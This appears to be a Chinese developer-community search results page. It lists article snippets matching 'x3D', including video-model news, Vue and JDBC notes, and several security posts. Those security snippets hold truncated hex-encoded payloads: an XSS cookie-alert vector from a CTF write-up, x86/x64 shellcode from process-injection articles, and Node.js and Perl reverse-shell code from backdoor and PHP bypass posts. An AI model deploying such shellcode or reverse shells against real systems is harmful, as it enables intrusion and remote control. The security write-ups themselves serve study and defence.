首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏摘繁华

    解决网页文字不能复制的方法

    \x20\x30\x3D\x31\x2E\x30\x3B\x30\x2E\x39\x3D\x30\x2E\x67\x3D\x30\x2E\x68\x3D\x30\x2E\x69\x3D\x30\x2E\ x6A\x3D\x30\x2E\x6F\x3D\x30\x2E\x39\x3D\x30\x2E\x70\x3D\x31\x2E\x39\x3D\x31\x2E\x67\x3D\x31\x2E\x68\x3D \x31\x2E\x69\x3D\x31\x2E\x6A\x3D\x71\x3B\x72\x28\x73\x20\x33\x20\x74\x20\x66\x2E\x75\x28\x27\x2A\x27\ x29\x29\x7B\x35\x28\x33\x2E\x36\x21\x3D\x37\x29\x7B\x38\x20\x32\x3D\x76\x2E\x77\x28\x33\x29\x3B\x35\x28 \x37\x21\x3D\x3D\x32\x5B\x22\x6B\x22\x5D\x26\x26\x27\x34\x27\x21\x3D\x32\x5B\x22\x6B\x22\x5D\x29\x7B\

    3.9K30编辑于 2021-12-27
  • 来自专栏CVer

    CVPR 2020(Oral) | Facebook提出X3D:超轻量级视频理解行为识别新作

    本文作者:木石 https://zhuanlan.zhihu.com/p/129279351 本文已由原作者授权,不得擅自二次转载 Facebook FAIR 于CVPR 2020 提出了轻量级 X3D Abstract This paper presents X3D, a family of efficient video networks that progressively expand a tiny To expand X3D to a specific target complexity, we perform progressive forward expansion followed by backward X3D achieves state-of-the-art performance while requiring 4.8\x~and 5.5\x~fewer multiply-adds and parameters

    2.2K31发布于 2020-04-23
  • 来自专栏WOLFRAM

    Wolfram语言演绎“与敌友共舞——Boid的集群智能”

    .#])) & /@ (x3d[[#]] - x3d) &; s := With[{r1 = r}, p[[r1]] = r; q[[r1]] = r]; x3d = RandomReal Graphics3D[{Opacity[opacity], PointSize[size], Dynamic[If[r < 200, s]; Point[y = x3d ; x3d = c*x3d + ps*f3d[p] - qs*f3d[q], VertexColors -> (ColorData[col][color*Norm[#]] & /@ ( x3d - y))]]}, PlotRange -> Range, ImageSize -> {700, 600}, Background -> Black, Boxed -> boxed]

    61430发布于 2019-07-31
  • 来自专栏新智元

    让手机跑SOTA模型快8倍!Facebook AI开源最强全栈视频库:PyTorchVideo!

    在三星Galaxy S10手机上运行的PyTorchVideo加速X3D模型,运行速度快8倍,处理一秒视频大约需要130毫秒 PyTorchVideo是个啥 PyTorchVideo的真身是一个视频理解的机器学习库 x 3 x 10 53.77 CSN R101 32x2 77.00 75.62 x 3 x 10 22.21 R(2+1)D R50 16x4 76.01 76.45 x 3 x 10 28.11 X3D XS 4x12 69.12 0.91 x 3 x 10 3.79 X3D S 13x6 73.33 2.96 x 3 x 10 3.79 X3D M 16x5 75.94 6.72 x 3 x 10 3.79 X3D L 16x5 77.44 26.64 x 3 x 10 6.15 Something-Something V2 arch depth pretrain frame length x //arxiv.org/abs/2106.05392 SlowFast networks for video recognition https://arxiv.org/abs/1812.03982 X3D

    83810发布于 2021-07-29
  • 来自专栏安全的矛与盾

    从35c3CTF的filemanager题目中学到的一个小tips

    这里q可以引发xss,测试方法: 上传文件名xxxxx,内容为 \x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x6f\x6e\x65\x72\x72\x6f\ x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3b\x3e 其实就是编码后的 搜索 \x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\ x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f 但是有个利用条件,就是首先需要有一个包含 \x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x78\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61

    42120编辑于 2023-02-27
  • 来自专栏AI科技评论

    时隔两年,Facebook又出视频理解利器

    Eye on the Ball: Trajectory Attention in Video Transformers SlowFast networks for video recognition X3D 3 x 10 53.77 CSN R101 32x2 77.00 75.62 x 3 x 10 22.21 R(2+1)D R50 16x4 76.01 76.45 x 3 x 10 28.11 X3D XS 4x12 69.12 0.91 x 3 x 10 3.79 X3D S 13x6 73.33 2.96 x 3 x 10 3.79 X3D M 16x5 75.94 6.72 x 3 x 10 3.79 X3D L 16x5 77.44 26.64 x 3 x 10 6.15 Something-SomethingV2 arch depth pretrain frame length

    78430发布于 2021-07-27
  • 来自专栏Gamma安全实验室

    Shellcode注入进程内存及调用

    x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03" "\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03" "\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D

    1.2K10发布于 2021-02-12
  • 来自专栏漫流砂

    msf反弹一把梭 | Linux后门系列

    x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x20\x76\x61\x72\x20\x72\x65\x71\x75\x69\x72\x65\x20\x3d \x20\x72\x65\x71\x75\x69\x72\x65\x28\x22\x6e\x65\x74\x22\x29\x2c\x20\x63\x70\x20\x3d\x20\x72\x65\x71\ \x20\x72\x65\x71\x75\x69\x72\x65\x28\x22\x75\x74\x69\x6c\x22\x29\x2c\x20\x73\x68\x20\x3d\x20\x63\x70\ \x20\x74\x68\x69\x73\x3b\x20\x76\x61\x72\x20\x63\x6f\x75\x6e\x74\x65\x72\x3d\x30\x3b\x20\x66\x75\x6e\ \x3d\x3d\x20\x22\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x22\x29\x20\x7b\x20\x73\x68\x2e\x73\x74\x64\x6f\

    2.2K20发布于 2020-08-20
  • 来自专栏玄魂工作室

    Shellcode注入进程内存及调用

    x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03" "\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03" "\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x0C\x8B\x09\x8B\x09\x8B\x69\x18\xAD\x3D

    1.6K10发布于 2021-02-24
  • 来自专栏牛人NR

    MySQL与JDBC精简笔记

    ; null;
    Statement statement &#x3D; null;
    Connection conn &#x3D; null;

    List<emp> list &#x3D; null;
    try {
    ("name");
    String sex &#x3D; rs.getString(" ");
    int dept_id &#x3D; rs.getInt("dept_id"

    4.6K30发布于 2020-09-01
  • 来自专栏入门到放弃之路

    爬虫入门到放弃07:爬虫没那么简单,带你走进js混淆、eval加密、字体加密

    \x3d','\x4a\x52\x38\x43\x54\x67\x3d\x3d','\x59\x73\x4f\x6e\x62\x53\x45\x51\x77\x37\x6f\x7a\x77\x71\x5a \x4b\x65\x73\x4b\x55\x77\x37\x6b\x77\x58\x38\x4f\x52\x49\x51\x3d\x3d','\x77\x37\x6f\x56\x53\x38\x4f\x53 \x3d','\x77\x72\x64\x48\x77\x37\x70\x39\x5a\x77\x3d\x3d','\x77\x34\x72\x44\x6f\x38\x4b\x6d\x4e\x45\x77 \x51\x77\x71\x55\x3d','\x64\x38\x4f\x73\x57\x68\x41\x55\x77\x37\x59\x7a\x77\x72\x55\x3d','\x77\x71\x6e \x3d','\x77\x72\x76\x43\x72\x63\x4f\x42\x52\x38\x4b\x6b','\x4d\x33\x77\x30\x66\x51\x3d\x3d','\x77\x36

    2.5K20编辑于 2022-05-09
  • 来自专栏入门到放弃之路

    爬虫入门到放弃07:eval加密、js函数混淆、字体加密

    \x3d','\x4a\x52\x38\x43\x54\x67\x3d\x3d','\x59\x73\x4f\x6e\x62\x53\x45\x51\x77\x37\x6f\x7a\x77\x71\x5a \x4b\x65\x73\x4b\x55\x77\x37\x6b\x77\x58\x38\x4f\x52\x49\x51\x3d\x3d','\x77\x37\x6f\x56\x53\x38\x4f\x53 \x3d','\x77\x72\x64\x48\x77\x37\x70\x39\x5a\x77\x3d\x3d','\x77\x34\x72\x44\x6f\x38\x4b\x6d\x4e\x45\x77 \x51\x77\x71\x55\x3d','\x64\x38\x4f\x73\x57\x68\x41\x55\x77\x37\x59\x7a\x77\x72\x55\x3d','\x77\x71\x6e \x3d','\x77\x72\x76\x43\x72\x63\x4f\x42\x52\x38\x4b\x6b','\x4d\x33\x77\x30\x66\x51\x3d\x3d','\x77\x36

    4.4K51发布于 2021-07-07
  • 来自专栏学派客

    js实现:输入密码才能打开网页。js实现密码保护的网页。

    www.jshaman.com/),可以在线加密js代码, 就把上面的代码,用jshaman加密一下,加密后代码如下: var _0x36e0=['UGxlYXNlIGlucHV0IHRoZSBwYXNzd29yZCE\x3d ','YmFpemh1YWRtaW4\x3d','UGFzc3dvcmQgZXJyb3Ih','cGFzc3dvcmQ\x3d','d3JpdGU\x3d'];(function(_0x14ba0c,_ x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2b\x2f\x3d

    7.4K30编辑于 2023-04-06
  • 来自专栏牛人NR

    简学Vue

    div id="app">
    <h1 v-if="type=&#x3D ;&#x3D;'A'">A</h1>
    <h1 v-else-if= ;"type=&#x3D;&#x3D;'B'">B</h1>
    <h1 v-else-if="type=&#x3D;&#x3D;'D'">D</h1>
    <span script>
    <script>
    var vm &#x3D

    2.5K20发布于 2020-09-01
  • 来自专栏宸机笔记

    MIPS-DIR645手动提取固件

    检索文件系统的magic签名 cramfs文件头特征为 0x28cd3d45 ❯ strings DIR645A1_FW102B08.bin|grep `python -c 'print "\x28\xcd\x3d \x45"'` #大小端依次检索 ❯ strings DIR645A1_FW102B08.bin|grep `python -c 'print "\x45\x3d\xcd\x28"'` ?

    1.2K30发布于 2021-04-02
  • C/C++ 将ShellCode注入进程内存

    ShellCode[] = "\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff" "\xff\xff\x48\xbb\xce\x25\x3d xf4\x32\x6d\xbe\x4b\xe6\xfe" "\xa5\x6f\xce\x25\x7c\xfe\x57\x46\x3b\x3e\x98\x6d\x0c\x7d\x73" "\x5e\xe2\x3d \xae\x6d\xb6\xfd\x0e\x5e\xe2\x3d\xee\x6d\xb6\xdd" "\x46\x5e\x66\xd8\x84\x6f\x70\x9e\xdf\x5e\x58\xaf\x62 \xe4\xca\xad\x75\xae\xc6\x57\x31\x2e\x96\x7b" "\x64\xf5\x57\x4e\x28\x36\x8f\x7f\x75\x2c\xfa\x36\x28\x3d \xe4\x67\x49\xe9\xbc\xec\x36\x25\x43\xfa\x5e" "\x95\xad\x4f\x90\xac\xcb\xc5\x56\x57\x30\x07\xce\x35\x3d

    99420编辑于 2022-12-28
  • 来自专栏ChaMd5安全团队

    香香的xss小记录(一)

    script src=\\payload.com></script> <iframe srcdoc="<img src&#<em>x3D</em> ;x onerror&#<em>x3D</em>;alert(d

    1.1K60发布于 2018-03-29
  • 来自专栏前端杂货铺

    前端开发中的字符编码

    img src=1 onerror=alert(23)>')">cccc

    3、<img src&#x3d ;1 onerror&#x3d;alert(2 ;(3)>'); 7、document.write('<img src&#x3d ;1 onerror&#x3d;alert(2

    2.5K80发布于 2018-03-15
  • 来自专栏Urahara Blog

    PHP Disabled_functions Bypass

    "\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x69\x70\x20\x3d\x20\x27". "\x27\x3b\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x70\x6f\x72\x74\x20\x3d\x20\x27". "\x27\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x70\x72\x6f\x74\x6f\x20\x3d\x20\x67\x65\x74\x70\x72". "\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e". "\x65\x6c\x6c\x20\x3d\x20\x27\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x27\x3b\x0d\x0a\x73\x6f".

    2.3K40发布于 2018-06-01
  • 来自专栏Urahara Blog

    PHP Disabled_functions Bypass

    "\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x69\x70\x20\x3d\x20\x27". "\x27\x3b\x0d\x0a\x6d\x79\x20\x24\x72\x65\x6d\x6f\x74\x65\x5f\x70\x6f\x72\x74\x20\x3d\x20\x27". "\x27\x3b\x0d\x0a\x0d\x0a\x6d\x79\x20\x24\x70\x72\x6f\x74\x6f\x20\x3d\x20\x67\x65\x74\x70\x72". "\x70\x61\x63\x6b\x5f\x61\x64\x64\x72\x20\x3d\x20\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69\x6e". "\x65\x6c\x6c\x20\x3d\x20\x27\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x27\x3b\x0d\x0a\x73\x6f".

    1.3K20发布于 2019-12-11
  • 领券